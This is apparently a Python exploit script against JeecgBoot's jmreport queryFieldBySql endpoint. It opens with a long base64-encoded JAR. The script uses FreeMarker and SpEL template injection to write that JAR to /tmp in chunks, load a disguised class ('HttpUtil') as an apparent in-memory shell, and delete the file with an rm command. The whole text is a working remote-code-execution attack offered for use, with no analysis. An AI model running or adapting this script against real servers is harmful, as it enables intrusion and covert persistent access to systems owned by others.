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"
	write_tmp_jar_file = "/tmp/temp.jar"
	mem_class_name = "org.apache.commons.lang.tajy.HttpUtil"
	back_url = "http://localhost:8080/jeecg-boot"

	def split_string(long_string, chunk_length=100):
	for i in range(0, len(long_string), chunk_length):
	yield long_string[i:i + chunk_length]


	def inject(payload):
	url = back_url + "/jmreport/queryFieldBySql"

	payload = {
	"sql": payload,
	"type": "0"
	}
	headers = {
	'Content-Type': 'application/json'
	}
	res = requests.request("POST", url, headers=headers, json=payload)
	print(res.text)


	def write_jar():
	generator = split_string(jar_file_base64)
	for segment in generator:
	seg_payload = """<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(org.apache.commons.io.FileUtils).writeByteArrayToFile(new java.io.File('""" + write_tmp_jar_file + """'), T(org.springframework.util.Base64Utils).decodeFromString('""" + segment + """'), true)").getValue()}"""
	inject(seg_payload)


	def rm_jar():
	rm_payload = """<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"rm """ + write_tmp_jar_file + """\")}"""
	inject(rm_payload)


	def load_class():
	load_payload = """"<#assign ex=\"freemarker.template.utility.ObjectConstructor\"?new()>${ex(\"org.springframework.expression.spel.standard.SpelExpressionParser\").parseExpression(\"new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\\\"file://""" + write_tmp_jar_file + """\\\")}, T(java.lang.Thread).currentThread().getContextClassLoader()).loadClass(\\\"""" + mem_class_name + """\\\").newInstance()\").getValue()}"""
	inject(load_payload)


	if __name__ == '__main__':
	start_time = time.time()
	rm_jar()
	write_jar()
	load_class()
	rm_jar()
	end_time = time.time()
	runtime = end_time - start_time
	print(f"耗时: {runtime:.6f} seconds")